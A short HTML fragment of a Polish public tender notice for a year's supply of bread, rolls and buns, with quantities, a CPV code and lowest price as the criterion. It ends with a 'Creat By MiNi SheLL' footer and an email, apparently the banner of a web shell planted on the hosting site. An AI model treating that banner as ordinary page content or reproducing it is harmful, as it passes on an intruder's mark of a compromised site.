<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	 Asortyment 	 Ilość w kg.	 Ilość w szt.
1.	Chleb 1,000 kg.	13 000	13 000
2.	Bułka 0,400 kg.	15 000	37 500
3.	Bułka 0,100 kg.	2 600	26 000
4.	Chleb razowy 1,000  kg. 	1 100	1 100
5.	Drożdżówka 0,080 kg.	80	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com